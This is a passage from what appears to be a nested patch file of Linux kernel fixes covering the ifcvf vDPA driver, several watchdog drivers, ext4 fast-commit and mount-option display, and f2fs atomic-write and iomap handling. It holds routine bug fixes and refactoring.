++	ret = ifcvf_request_vq_irq(vf);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = ifcvf_request_config_irq(adapter);
++	ret = ifcvf_request_config_irq(vf);
+ 
+ 	if (ret)
+ 		return ret;
+@@ -414,7 +402,7 @@ static struct ifcvf_hw *vdpa_to_vf(struct vdpa_device *vdpa_dev)
+ {
+ 	struct ifcvf_adapter *adapter = vdpa_to_adapter(vdpa_dev);
+ 
+-	return &adapter->vf;
++	return adapter->vf;
+ }
+ 
+ static u64 ifcvf_vdpa_get_device_features(struct vdpa_device *vdpa_dev)
+@@ -479,7 +467,7 @@ static void ifcvf_vdpa_set_status(struct vdpa_device *vdpa_dev, u8 status)
+ 
+ 	if ((status & VIRTIO_CONFIG_S_DRIVER_OK) &&
+ 	    !(status_old & VIRTIO_CONFIG_S_DRIVER_OK)) {
+-		ret = ifcvf_request_irq(adapter);
++		ret = ifcvf_request_irq(vf);
+ 		if (ret) {
+ 			status = ifcvf_get_status(vf);
+ 			status |= VIRTIO_CONFIG_S_FAILED;
+@@ -511,7 +499,7 @@ static int ifcvf_vdpa_reset(struct vdpa_device *vdpa_dev)
+ 
+ 	if (status_old & VIRTIO_CONFIG_S_DRIVER_OK) {
+ 		ifcvf_stop_datapath(adapter);
+-		ifcvf_free_irq(adapter);
++		ifcvf_free_irq(vf);
+ 	}
+ 
+ 	ifcvf_reset_vring(adapter);
+@@ -758,12 +746,20 @@ static int ifcvf_vdpa_dev_add(struct vdpa_mgmt_dev *mdev, const char *name,
+ 	int ret;
+ 
+ 	ifcvf_mgmt_dev = container_of(mdev, struct ifcvf_vdpa_mgmt_dev, mdev);
+-	if (!ifcvf_mgmt_dev->adapter)
+-		return -EOPNOTSUPP;
++	vf = &ifcvf_mgmt_dev->vf;
++	pdev = vf->pdev;
++	adapter = vdpa_alloc_device(struct ifcvf_adapter, vdpa,
++				    &pdev->dev, &ifc_vdpa_ops, 1, 1, NULL, false);
++	if (IS_ERR(adapter)) {
++		IFCVF_ERR(pdev, "Failed to allocate vDPA structure");
++		return PTR_ERR(adapter);
++	}
+ 
+-	adapter = ifcvf_mgmt_dev->adapter;
+-	vf = &adapter->vf;
+-	pdev = adapter->pdev;
++	ifcvf_mgmt_dev->adapter = adapter;
++	adapter->pdev = pdev;
++	adapter->vdpa.dma_dev = &pdev->dev;
++	adapter->vdpa.mdev = mdev;
++	adapter->vf = vf;
+ 	vdpa_dev = &adapter->vdpa;
+ 
+ 	if (name)
+@@ -781,7 +777,6 @@ static int ifcvf_vdpa_dev_add(struct vdpa_mgmt_dev *mdev, const char *name,
+ 	return 0;
+ }
+ 
+-
+ static void ifcvf_vdpa_dev_del(struct vdpa_mgmt_dev *mdev, struct vdpa_device *dev)
+ {
+ 	struct ifcvf_vdpa_mgmt_dev *ifcvf_mgmt_dev;
+@@ -800,7 +795,6 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+ 	struct ifcvf_vdpa_mgmt_dev *ifcvf_mgmt_dev;
+ 	struct device *dev = &pdev->dev;
+-	struct ifcvf_adapter *adapter;
+ 	struct ifcvf_hw *vf;
+ 	u32 dev_type;
+ 	int ret, i;
+@@ -831,20 +825,16 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	}
+ 
+ 	pci_set_master(pdev);
+-
+-	adapter = vdpa_alloc_device(struct ifcvf_adapter, vdpa,
+-				    dev, &ifc_vdpa_ops, 1, 1, NULL, false);
+-	if (IS_ERR(adapter)) {
+-		IFCVF_ERR(pdev, "Failed to allocate vDPA structure");
+-		return PTR_ERR(adapter);
++	ifcvf_mgmt_dev = kzalloc(sizeof(struct ifcvf_vdpa_mgmt_dev), GFP_KERNEL);
++	if (!ifcvf_mgmt_dev) {
++		IFCVF_ERR(pdev, "Failed to alloc memory for the vDPA management device\n");
++		return -ENOMEM;
+ 	}
+ 
+-	vf = &adapter->vf;
++	vf = &ifcvf_mgmt_dev->vf;
+ 	vf->dev_type = get_dev_type(pdev);
+ 	vf->base = pcim_iomap_table(pdev);
+-
+-	adapter->pdev = pdev;
+-	adapter->vdpa.dma_dev = &pdev->dev;
++	vf->pdev = pdev;
+ 
+ 	ret = ifcvf_init_hw(vf, pdev);
+ 	if (ret) {
+@@ -858,16 +848,6 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	vf->hw_features = ifcvf_get_hw_features(vf);
+ 	vf->config_size = ifcvf_get_config_size(vf);
+ 
+-	ifcvf_mgmt_dev = kzalloc(sizeof(struct ifcvf_vdpa_mgmt_dev), GFP_KERNEL);
+-	if (!ifcvf_mgmt_dev) {
+-		IFCVF_ERR(pdev, "Failed to alloc memory for the vDPA management device\n");
+-		return -ENOMEM;
+-	}
+-
+-	ifcvf_mgmt_dev->mdev.ops = &ifcvf_vdpa_mgmt_dev_ops;
+-	ifcvf_mgmt_dev->mdev.device = dev;
+-	ifcvf_mgmt_dev->adapter = adapter;
+-
+ 	dev_type = get_dev_type(pdev);
+ 	switch (dev_type) {
+ 	case VIRTIO_ID_NET:
+@@ -882,12 +862,11 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		goto err;
+ 	}
+ 
++	ifcvf_mgmt_dev->mdev.ops = &ifcvf_vdpa_mgmt_dev_ops;
++	ifcvf_mgmt_dev->mdev.device = dev;
+ 	ifcvf_mgmt_dev->mdev.max_supported_vqs = vf->nr_vring;
+ 	ifcvf_mgmt_dev->mdev.supported_features = vf->hw_features;
+ 
+-	adapter->vdpa.mdev = &ifcvf_mgmt_dev->mdev;
+-
+-
+ 	ret = vdpa_mgmtdev_register(&ifcvf_mgmt_dev->mdev);
+ 	if (ret) {
+ 		IFCVF_ERR(pdev,
+diff --git a/drivers/watchdog/at91sam9_wdt.c b/drivers/watchdog/at91sam9_wdt.c
+index 292b5a1ca8318..fed7be2464420 100644
+--- a/drivers/watchdog/at91sam9_wdt.c
++++ b/drivers/watchdog/at91sam9_wdt.c
+@@ -206,10 +206,9 @@ static int at91_wdt_init(struct platform_device *pdev, struct at91wdt *wdt)
+ 			 "min heartbeat and max heartbeat might be too close for the system to handle it correctly\n");
+ 
+ 	if ((tmp & AT91_WDT_WDFIEN) && wdt->irq) {
+-		err = request_irq(wdt->irq, wdt_interrupt,
+-				  IRQF_SHARED | IRQF_IRQPOLL |
+-				  IRQF_NO_SUSPEND,
+-				  pdev->name, wdt);
++		err = devm_request_irq(dev, wdt->irq, wdt_interrupt,
++				       IRQF_SHARED | IRQF_IRQPOLL | IRQF_NO_SUSPEND,
++				       pdev->name, wdt);
+ 		if (err)
+ 			return err;
+ 	}
+diff --git a/drivers/watchdog/pcwd_usb.c b/drivers/watchdog/pcwd_usb.c
+index 1bdaf17c1d38d..8202f0a6b0935 100644
+--- a/drivers/watchdog/pcwd_usb.c
++++ b/drivers/watchdog/pcwd_usb.c
+@@ -325,7 +325,8 @@ static int usb_pcwd_set_heartbeat(struct usb_pcwd_private *usb_pcwd, int t)
+ static int usb_pcwd_get_temperature(struct usb_pcwd_private *usb_pcwd,
+ 							int *temperature)
+ {
+-	unsigned char msb, lsb;
++	unsigned char msb = 0x00;
++	unsigned char lsb = 0x00;
+ 
+ 	usb_pcwd_send_command(usb_pcwd, CMD_READ_TEMP, &msb, &lsb);
+ 
+@@ -341,7 +342,8 @@ static int usb_pcwd_get_temperature(struct usb_pcwd_private *usb_pcwd,
+ static int usb_pcwd_get_timeleft(struct usb_pcwd_private *usb_pcwd,
+ 								int *time_left)
+ {
+-	unsigned char msb, lsb;
++	unsigned char msb = 0x00;
++	unsigned char lsb = 0x00;
+ 
+ 	/* Read the time that's left before rebooting */
+ 	/* Note: if the board is not yet armed then we will read 0xFFFF */
+diff --git a/drivers/watchdog/rzg2l_wdt.c b/drivers/watchdog/rzg2l_wdt.c
+index 974a4194a8fd6..d404953d0e0f4 100644
+--- a/drivers/watchdog/rzg2l_wdt.c
++++ b/drivers/watchdog/rzg2l_wdt.c
+@@ -8,6 +8,7 @@
+ #include <linux/clk.h>
+ #include <linux/delay.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/of_device.h>
+@@ -35,6 +36,8 @@
+ 
+ #define F2CYCLE_NSEC(f)			(1000000000 / (f))
+ 
++#define RZV2M_A_NSEC			730
++
+ static bool nowayout = WATCHDOG_NOWAYOUT;
+ module_param(nowayout, bool, 0);
+ MODULE_PARM_DESC(nowayout, "Watchdog cannot be stopped once started (default="
+@@ -51,11 +54,35 @@ struct rzg2l_wdt_priv {
+ 	struct reset_control *rstc;
+ 	unsigned long osc_clk_rate;
+ 	unsigned long delay;
++	unsigned long minimum_assertion_period;
+ 	struct clk *pclk;
+ 	struct clk *osc_clk;
+ 	enum rz_wdt_type devtype;
+ };
+ 
++static int rzg2l_wdt_reset(struct rzg2l_wdt_priv *priv)
++{
++	int err, status;
++
++	if (priv->devtype == WDT_RZV2M) {
++		/* WDT needs TYPE-B reset control */
++		err = reset_control_assert(priv->rstc);
++		if (err)
++			return err;
++		ndelay(priv->minimum_assertion_period);
++		err = reset_control_deassert(priv->rstc);
++		if (err)
++			return err;
++		err = read_poll_timeout(reset_control_status, status,
++					status != 1, 0, 1000, false,
++					priv->rstc);
++	} else {
++		err = reset_control_reset(priv->rstc);
++	}
++
++	return err;
++}
++
+ static void rzg2l_wdt_wait_delay(struct rzg2l_wdt_priv *priv)
+ {
+ 	/* delay timer when change the setting register */
+@@ -115,25 +142,23 @@ static int rzg2l_wdt_stop(struct watchdog_device *wdev)
+ {
+ 	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
+ 
++	rzg2l_wdt_reset(priv);
+ 	pm_runtime_put(wdev->parent);
+-	reset_control_reset(priv->rstc);
+ 
+ 	return 0;
+ }
+ 
+ static int rzg2l_wdt_set_timeout(struct watchdog_device *wdev, unsigned int timeout)
+ {
+-	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
+-
+ 	wdev->timeout = timeout;
+ 
+ 	/*
+ 	 * If the watchdog is active, reset the module for updating the WDTSET
+-	 * register so that it is updated with new timeout values.
++	 * register by calling rzg2l_wdt_stop() (which internally calls reset_control_reset()
++	 * to reset the module) so that it is updated with new timeout values.
+ 	 */
+ 	if (watchdog_active(wdev)) {
+-		pm_runtime_put(wdev->parent);
+-		reset_control_reset(priv->rstc);
++		rzg2l_wdt_stop(wdev);
+ 		rzg2l_wdt_start(wdev);
+ 	}
+ 
+@@ -156,6 +181,7 @@ static int rzg2l_wdt_restart(struct watchdog_device *wdev,
+ 		rzg2l_wdt_write(priv, PEEN_FORCE, PEEN);
+ 	} else {
+ 		/* RZ/V2M doesn't have parity error registers */
++		rzg2l_wdt_reset(priv);
+ 
+ 		wdev->timeout = 0;
+ 
+@@ -253,6 +279,13 @@ static int rzg2l_wdt_probe(struct platform_device *pdev)
+ 
+ 	priv->devtype = (uintptr_t)of_device_get_match_data(dev);
+ 
++	if (priv->devtype == WDT_RZV2M) {
++		priv->minimum_assertion_period = RZV2M_A_NSEC +
++			3 * F2CYCLE_NSEC(pclk_rate) + 5 *
++			max(F2CYCLE_NSEC(priv->osc_clk_rate),
++			    F2CYCLE_NSEC(pclk_rate));
++	}
++
+ 	pm_runtime_enable(&pdev->dev);
+ 
+ 	priv->wdev.info = &rzg2l_wdt_ident;
+diff --git a/drivers/watchdog/sbsa_gwdt.c b/drivers/watchdog/sbsa_gwdt.c
+index 9791c74aebd48..63862803421f1 100644
+--- a/drivers/watchdog/sbsa_gwdt.c
++++ b/drivers/watchdog/sbsa_gwdt.c
+@@ -150,6 +150,7 @@ static int sbsa_gwdt_set_timeout(struct watchdog_device *wdd,
+ 	struct sbsa_gwdt *gwdt = watchdog_get_drvdata(wdd);
+ 
+ 	wdd->timeout = timeout;
++	timeout = clamp_t(unsigned int, timeout, 1, wdd->max_hw_heartbeat_ms / 1000);
+ 
+ 	if (action)
+ 		sbsa_gwdt_reg_write(gwdt->clk * timeout, gwdt);
+diff --git a/drivers/watchdog/watchdog_dev.c b/drivers/watchdog/watchdog_dev.c
+index 55574ed425042..fdffa6859dde3 100644
+--- a/drivers/watchdog/watchdog_dev.c
++++ b/drivers/watchdog/watchdog_dev.c
+@@ -1061,8 +1061,8 @@ static int watchdog_cdev_register(struct watchdog_device *wdd)
+ 		if (wdd->id == 0) {
+ 			misc_deregister(&watchdog_miscdev);
+ 			old_wd_data = NULL;
+-			put_device(&wd_data->dev);
+ 		}
++		put_device(&wd_data->dev);
+ 		return err;
+ 	}
+ 
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 4e739902dc03a..a2bc440743ae4 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
+@@ -1529,6 +1529,7 @@ struct ext4_sb_info {
+ 	unsigned int s_mount_opt2;
+ 	unsigned long s_mount_flags;
+ 	unsigned int s_def_mount_opt;
++	unsigned int s_def_mount_opt2;
+ 	ext4_fsblk_t s_sb_block;
+ 	atomic64_t s_resv_clusters;
+ 	kuid_t s_resuid;
+diff --git a/fs/ext4/fast_commit.c b/fs/ext4/fast_commit.c
+index 7ed71c652f67f..1110bfa0a5b73 100644
+--- a/fs/ext4/fast_commit.c
++++ b/fs/ext4/fast_commit.c
+@@ -1354,8 +1354,14 @@ struct dentry_info_args {
+ 	char *dname;
+ };
+ 
++/* Same as struct ext4_fc_tl, but uses native endianness fields */
++struct ext4_fc_tl_mem {
++	u16 fc_tag;
++	u16 fc_len;
++};
++
+ static inline void tl_to_darg(struct dentry_info_args *darg,
+-			      struct ext4_fc_tl *tl, u8 *val)
++			      struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_dentry_info fcd;
+ 
+@@ -1367,16 +1373,18 @@ static inline void tl_to_darg(struct dentry_info_args *darg,
+ 	darg->dname_len = tl->fc_len - sizeof(struct ext4_fc_dentry_info);
+ }
+ 
+-static inline void ext4_fc_get_tl(struct ext4_fc_tl *tl, u8 *val)
++static inline void ext4_fc_get_tl(struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+-	memcpy(tl, val, EXT4_FC_TAG_BASE_LEN);
+-	tl->fc_len = le16_to_cpu(tl->fc_len);
+-	tl->fc_tag = le16_to_cpu(tl->fc_tag);
++	struct ext4_fc_tl tl_disk;
++
++	memcpy(&tl_disk, val, EXT4_FC_TAG_BASE_LEN);
++	tl->fc_len = le16_to_cpu(tl_disk.fc_len);
++	tl->fc_tag = le16_to_cpu(tl_disk.fc_tag);
+ }
+ 
+ /* Unlink replay function */
+-static int ext4_fc_replay_unlink(struct super_block *sb, struct ext4_fc_tl *tl,
+-				 u8 *val)
++static int ext4_fc_replay_unlink(struct super_block *sb,
++				 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode, *old_parent;
+ 	struct qstr entry;
+@@ -1473,8 +1481,8 @@ out:
+ }
+ 
+ /* Link replay function */
+-static int ext4_fc_replay_link(struct super_block *sb, struct ext4_fc_tl *tl,
+-			       u8 *val)
++static int ext4_fc_replay_link(struct super_block *sb,
++			       struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode;
+ 	struct dentry_info_args darg;
+@@ -1528,8 +1536,8 @@ static int ext4_fc_record_modified_inode(struct super_block *sb, int ino)
+ /*
+  * Inode replay function
+  */
+-static int ext4_fc_replay_inode(struct super_block *sb, struct ext4_fc_tl *tl,
+-				u8 *val)
++static int ext4_fc_replay_inode(struct super_block *sb,
++				struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_inode fc_inode;
+ 	struct ext4_inode *raw_inode;
+@@ -1631,8 +1639,8 @@ out:
+  * inode for which we are trying to create a dentry here, should already have
+  * been replayed before we start here.
+  */
+-static int ext4_fc_replay_create(struct super_block *sb, struct ext4_fc_tl *tl,
+-				 u8 *val)
++static int ext4_fc_replay_create(struct super_block *sb,
++				 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	int ret = 0;
+ 	struct inode *inode = NULL;
+@@ -1730,7 +1738,7 @@ int ext4_fc_record_regions(struct super_block *sb, int ino,
+ 
+ /* Replay add range tag */
+ static int ext4_fc_replay_add_range(struct super_block *sb,
+-				    struct ext4_fc_tl *tl, u8 *val)
++				    struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct ext4_fc_add_range fc_add_ex;
+ 	struct ext4_extent newex, *ex;
+@@ -1850,8 +1858,8 @@ out:
+ 
+ /* Replay DEL_RANGE tag */
+ static int
+-ext4_fc_replay_del_range(struct super_block *sb, struct ext4_fc_tl *tl,
+-			 u8 *val)
++ext4_fc_replay_del_range(struct super_block *sb,
++			 struct ext4_fc_tl_mem *tl, u8 *val)
+ {
+ 	struct inode *inode;
+ 	struct ext4_fc_del_range lrange;
+@@ -2047,7 +2055,7 @@ static int ext4_fc_replay_scan(journal_t *journal,
+ 	struct ext4_fc_replay_state *state;
+ 	int ret = JBD2_FC_REPLAY_CONTINUE;
+ 	struct ext4_fc_add_range ext;
+-	struct ext4_fc_tl tl;
++	struct ext4_fc_tl_mem tl;
+ 	struct ext4_fc_tail tail;
+ 	__u8 *start, *end, *cur, *val;
+ 	struct ext4_fc_head head;
+@@ -2166,7 +2174,7 @@ static int ext4_fc_replay(journal_t *journal, struct buffer_head *bh,
+ {
+ 	struct super_block *sb = journal->j_private;
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+-	struct ext4_fc_tl tl;
++	struct ext4_fc_tl_mem tl;
+ 	__u8 *start, *end, *cur, *val;
+ 	int ret = JBD2_FC_REPLAY_CONTINUE;
+ 	struct ext4_fc_replay_state *state = &sbi->s_fc_replay_state;
+diff --git a/fs/ext4/super.c b/fs/ext4/super.c
+index aa4f65663fad8..8011600999586 100644
+--- a/fs/ext4/super.c
++++ b/fs/ext4/super.c
+@@ -2146,7 +2146,7 @@ static int ext4_parse_param(struct fs_context *fc, struct fs_parameter *param)
+ 		return 0;
+ 	case Opt_commit:
+ 		if (result.uint_32 == 0)
+-			ctx->s_commit_interval = JBD2_DEFAULT_MAX_COMMIT_AGE;
++			result.uint_32 = JBD2_DEFAULT_MAX_COMMIT_AGE;
+ 		else if (result.uint_32 > INT_MAX / HZ) {
+ 			ext4_msg(NULL, KERN_ERR,
+ 				 "Invalid commit interval %d, "
+@@ -2894,7 +2894,7 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	struct ext4_super_block *es = sbi->s_es;
+-	int def_errors, def_mount_opt = sbi->s_def_mount_opt;
++	int def_errors;
+ 	const struct mount_opts *m;
+ 	char sep = nodefs ? '\n' : ',';
+ 
+@@ -2906,15 +2906,28 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ 
+ 	for (m = ext4_mount_opts; m->token != Opt_err; m++) {
+ 		int want_set = m->flags & MOPT_SET;
++		int opt_2 = m->flags & MOPT_2;
++		unsigned int mount_opt, def_mount_opt;
++
+ 		if (((m->flags & (MOPT_SET|MOPT_CLEAR)) == 0) ||
+ 		    m->flags & MOPT_SKIP)
+ 			continue;
+-		if (!nodefs && !(m->mount_opt & (sbi->s_mount_opt ^ def_mount_opt)))
+-			continue; /* skip if same as the default */
++
++		if (opt_2) {
++			mount_opt = sbi->s_mount_opt2;
++			def_mount_opt = sbi->s_def_mount_opt2;
++		} else {
++			mount_opt = sbi->s_mount_opt;
++			def_mount_opt = sbi->s_def_mount_opt;
++		}
++		/* skip if same as the default */
++		if (!nodefs && !(m->mount_opt & (mount_opt ^ def_mount_opt)))
++			continue;
++		/* select Opt_noFoo vs Opt_Foo */
+ 		if ((want_set &&
+-		     (sbi->s_mount_opt & m->mount_opt) != m->mount_opt) ||
+-		    (!want_set && (sbi->s_mount_opt & m->mount_opt)))
+-			continue; /* select Opt_noFoo vs Opt_Foo */
++		     (mount_opt & m->mount_opt) != m->mount_opt) ||
++		    (!want_set && (mount_opt & m->mount_opt)))
++			continue;
+ 		SEQ_OPTS_PRINT("%s", token2str(m->token));
+ 	}
+ 
+@@ -2942,7 +2955,7 @@ static int _ext4_show_options(struct seq_file *seq, struct super_block *sb,
+ 	if (nodefs || sbi->s_stripe)
+ 		SEQ_OPTS_PRINT("stripe=%lu", sbi->s_stripe);
+ 	if (nodefs || EXT4_MOUNT_DATA_FLAGS &
+-			(sbi->s_mount_opt ^ def_mount_opt)) {
++			(sbi->s_mount_opt ^ sbi->s_def_mount_opt)) {
+ 		if (test_opt(sb, DATA_FLAGS) == EXT4_MOUNT_JOURNAL_DATA)
+ 			SEQ_OPTS_PUTS("data=journal");
+ 		else if (test_opt(sb, DATA_FLAGS) == EXT4_MOUNT_ORDERED_DATA)
+@@ -5087,6 +5100,7 @@ static int __ext4_fill_super(struct fs_context *fc, struct super_block *sb)
+ 		goto failed_mount;
+ 
+ 	sbi->s_def_mount_opt = sbi->s_mount_opt;
++	sbi->s_def_mount_opt2 = sbi->s_mount_opt2;
+ 
+ 	err = ext4_check_opt_consistency(fc, sb);
+ 	if (err < 0)
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 5f4519af98214..f92899bfcbd5e 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -4138,20 +4138,24 @@ static int f2fs_iomap_begin(struct inode *inode, loff_t offset, loff_t length,
+ 	 */
+ 	map.m_len = fscrypt_limit_io_blocks(inode, map.m_lblk, map.m_len);
+ 
+-	if (map.m_flags & (F2FS_MAP_MAPPED | F2FS_MAP_UNWRITTEN)) {
+-		iomap->length = blks_to_bytes(inode, map.m_len);
+-		if (map.m_flags & F2FS_MAP_MAPPED) {
+-			iomap->type = IOMAP_MAPPED;
+-			iomap->flags |= IOMAP_F_MERGED;
+-		} else {
+-			iomap->type = IOMAP_UNWRITTEN;
+-		}
+-		if (WARN_ON_ONCE(!__is_valid_data_blkaddr(map.m_pblk)))
+-			return -EINVAL;
++	/*
++	 * We should never see delalloc or compressed extents here based on
++	 * prior flushing and checks.
++	 */
++	if (WARN_ON_ONCE(map.m_pblk == NEW_ADDR))
++		return -EINVAL;
++	if (WARN_ON_ONCE(map.m_pblk == COMPRESS_ADDR))
++		return -EINVAL;
+ 
++	if (map.m_pblk != NULL_ADDR) {
++		iomap->length = blks_to_bytes(inode, map.m_len);
++		iomap->type = IOMAP_MAPPED;
++		iomap->flags |= IOMAP_F_MERGED;
+ 		iomap->bdev = map.m_bdev;
+ 		iomap->addr = blks_to_bytes(inode, map.m_pblk);
+ 	} else {
++		if (flags & IOMAP_WRITE)
++			return -ENOTBLK;
+ 		iomap->length = blks_to_bytes(inode, next_pgofs) -
+ 				iomap->offset;
+ 		iomap->type = IOMAP_HOLE;
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 8b9f0b3c77232..87664c309b3c8 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -764,6 +764,7 @@ enum {
+ 	FI_COMPRESS_RELEASED,	/* compressed blocks were released */
+ 	FI_ALIGNED_WRITE,	/* enable aligned write */
+ 	FI_COW_FILE,		/* indicate COW file */
++	FI_ATOMIC_COMMITTED,	/* indicate atomic commit completed except disk sync */
+ 	FI_MAX,			/* max flag, never be used */
+ };
+ 
+@@ -822,6 +823,7 @@ struct f2fs_inode_info {
+ 	unsigned int i_cluster_size;		/* cluster size */
+ 
+ 	unsigned int atomic_write_cnt;
++	loff_t original_i_size;		/* original i_size before atomic write */
+ };
+ 
+ static inline void get_extent_info(struct extent_info *ext,
+@@ -3072,6 +3074,8 @@ static inline void f2fs_i_blocks_write(struct inode *inode,
+ 		set_inode_flag(inode, FI_AUTO_RECOVER);
+ }
+ 
++static inline bool f2fs_is_atomic_file(struct inode *inode);
++
+ static inline void f2fs_i_size_write(struct inode *inode, loff_t i_size)
+ {
+ 	bool clean = !is_inode_flag_set(inode, FI_DIRTY_INODE);
+@@ -3081,6 +3085,10 @@ static inline void f2fs_i_size_write(struct inode *inode, loff_t i_size)
+ 		return;
+ 
+ 	i_size_write(inode, i_size);
++
++	if (f2fs_is_atomic_file(inode))
++		return;
++
+ 	f2fs_mark_inode_dirty_sync(inode, true);
+ 	if (clean || recover)
+ 		set_inode_flag(inode, FI_AUTO_RECOVER);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index f96bbfa8b3991..773b3ddc2cd72 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -1865,7 +1865,10 @@ static int f2fs_release_file(struct inode *inode, struct file *filp)
+ 			atomic_read(&inode->i_writecount) != 1)
+ 		return 0;
+ 
++	inode_lock(inode);
+ 	f2fs_abort_atomic_write(inode, true);
++	inode_unlock(inode);
++
+ 	return 0;
+ }
+ 
+@@ -1879,8 +1882,13 @@ static int f2fs_file_flush(struct file *file, fl_owner_t id)
+ 	 * until all the writers close its file. Since this should be done
+ 	 * before dropping file lock, it needs to do in ->flush.
+ 	 */
+-	if (F2FS_I(inode)->atomic_write_task == current)
++	if (F2FS_I(inode)->atomic_write_task == current &&
++				(current->flags & PF_EXITING)) {
++		inode_lock(inode);
+ 		f2fs_abort_atomic_write(inode, true);
++		inode_unlock(inode);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -2041,6 +2049,7 @@ static int f2fs_ioc_start_atomic_write(struct file *filp)
+ 	struct f2fs_inode_info *fi = F2FS_I(inode);
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
+ 	struct inode *pinode;
++	loff_t isize;
+ 	int ret;
+ 
+ 	if (!inode_owner_or_capable(mnt_userns, inode))
+@@ -2085,27 +2094,39 @@ static int f2fs_ioc_start_atomic_write(struct file *filp)
+ 		goto out;
+ 	}
+ 
+-	/* Create a COW inode for atomic write */
+-	pinode = f2fs_iget(inode->i_sb, fi->i_pino);
+-	if (IS_ERR(pinode)) {
+-		f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
+-		ret = PTR_ERR(pinode);
+-		goto out;
+-	}
++	/* Check if the inode already has a COW inode */
++	if (fi->cow_inode == NULL) {
++		/* Create a COW inode for atomic write */
++		pinode = f2fs_iget(inode->i_sb, fi->i_pino);
++		if (IS_ERR(pinode)) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			ret = PTR_ERR(pinode);
++			goto out;
++		}
+ 
+-	ret = f2fs_get_tmpfile(mnt_userns, pinode, &fi->cow_inode);
+-	iput(pinode);
+-	if (ret) {
+-		f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
+-		goto out;
++		ret = f2fs_get_tmpfile(mnt_userns, pinode, &fi->cow_inode);
++		iput(pinode);
++		if (ret) {
++			f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
++			goto out;
++		}
++
++		set_inode_flag(fi->cow_inode, FI_COW_FILE);
++		clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
++	} else {
++		/* Reuse the already created COW inode */
++		f2fs_do_truncate_blocks(fi->cow_inode, 0, true);
+ 	}
+-	f2fs_i_size_write(fi->cow_inode, i_size_read(inode));
++
++	f2fs_write_inode(inode, NULL);
++
++	isize = i_size_read(inode);
++	fi->original_i_size = isize;
++	f2fs_i_size_write(fi->cow_inode, isize);
+ 
+ 	stat_inc_atomic_inode(inode);
+ 
+ 	set_inode_flag(inode, FI_ATOMIC_FILE);
+-	set_inode_flag(fi->cow_inode, FI_COW_FILE);
+-	clear_inode_flag(fi->cow_inode, FI_INLINE_DATA);
+ 	f2fs_up_write(&fi->i_gc_rwsem[WRITE]);
+ 
+ 	f2fs_update_time(sbi, REQ_TIME);
+@@ -2137,16 +2158,14 @@ static int f2fs_ioc_commit_atomic_write(struct file *filp)
+ 
+ 	if (f2fs_is_atomic_file(inode)) {
+ 		ret = f2fs_commit_atomic_write(inode);
+-		if (ret)
+-			goto unlock_out;
+-
+-		ret = f2fs_do_sync_file(filp, 0, LLONG_MAX, 0, true);
+ 		if (!ret)
+-			f2fs_abort_atomic_write(inode, false);
++			ret = f2fs_do_sync_file(filp, 0, LLONG_MAX, 0, true);
++
++		f2fs_abort_atomic_write(inode, ret);
+ 	} else {
+ 		ret = f2fs_do_sync_file(filp, 0, LLONG_MAX, 1, false);
+ 	}
+-unlock_out:
++
+ 	inode_unlock(inode);
+ 	mnt_drop_write_file(filp);
+ 	return ret;
+@@ -2326,6 +2345,7 @@ static int f2fs_ioc_get_encryption_pwsalt(struct file *filp, unsigned long arg)
+ {
+ 	struct inode *inode = file_inode(filp);
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(inode);
++	u8 encrypt_pw_salt[16];
+ 	int err;
+ 
+ 	if (!f2fs_sb_has_encrypt(sbi))
+@@ -2350,12 +2370,14 @@ static int f2fs_ioc_get_encryption_pwsalt(struct file *filp, unsigned long arg)
+ 		goto out_err;
+ 	}
+ got_it:
+-	if (copy_to_user((__u8 __user *)arg, sbi->raw_super->encrypt_pw_salt,
+-									16))
+-		err = -EFAULT;
++	memcpy(encrypt_pw_salt, sbi->raw_super->encrypt_pw_salt, 16);
+ out_err:
+ 	f2fs_up_write(&sbi->sb_lock);
+ 	mnt_drop_write_file(filp);
++
++	if (!err && copy_to_user((__u8 __user *)arg, encrypt_pw_salt, 16))
++		err = -EFAULT;
++
+ 	return err;
+ }
+ 
+@@ -3930,7 +3952,7 @@ static int f2fs_ioc_set_compress_option(struct file *filp, unsigned long arg)
+ 		goto out;
+ 	}
+ 
+-	if (inode->i_size != 0) {
++	if (F2FS_HAS_BLOCKS(inode)) {
+ 		ret = -EFBIG;
+ 		goto out;
+ 	}
